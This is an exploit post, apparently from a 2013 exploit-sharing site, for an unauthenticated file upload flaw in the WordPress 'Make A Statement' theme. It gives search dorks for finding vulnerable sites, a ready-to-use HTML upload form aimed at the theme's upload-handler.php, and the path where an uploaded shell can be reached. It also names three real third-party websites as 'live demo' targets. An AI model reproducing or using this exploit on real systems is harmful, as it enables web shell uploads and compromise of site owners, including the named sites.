WordPress Make A Statement CSRF


#Title              : Wordpress Make A Statement Themes CSRF File Upload Vulnerability
#Author          : DevilScreaM
#Date             : 11/17/2013 - 17 November 2013
#Category      : Web Applications
#Type             : PHP
#Version        : 1.x.x
#Vendor         : http://themes.mas.gambit.ph/
#Greetz          : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
                          Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber | Indonesian Coder
#Thanks        : ShadoWNamE | gruberr0r | Win32Conficker | Xrwrr | Rec0ded |
#Tested          : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : CSRF

#Dork :

inurl:wp-content/themes/make_a_statement
inurl:wp-content/themes/make_a_statement_v1


CSRF File Upload Vulnerability

Exploit & POC :

http://site-target/wp-content/themes/make_a_statement/library/includes/upload-handler.php

Script :

<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/make_a_statement/library/includes/upload-handler.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>


File Access :

http://site-target/uploads/[years]/[month]/your_shell.php

Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php

Live Demo :

http://pinnacleacademyva.com/wp-content/themes/make_a_statement/library/includes/upload-handler.php
http://harmonicstudios.com/wp-content/themes/make_a_statement/library/includes/upload-handler.php
http://taozuieu.com/wp-content/themes/make_a_statement/library/includes/upload-handler.php


Leave a Reply


[ PLAYGROUND ]

Indonesian Coder || Codenesia || Exploit Database || Exploit ID || HN Community || devilzc0de || Packet Storm || cxsecurity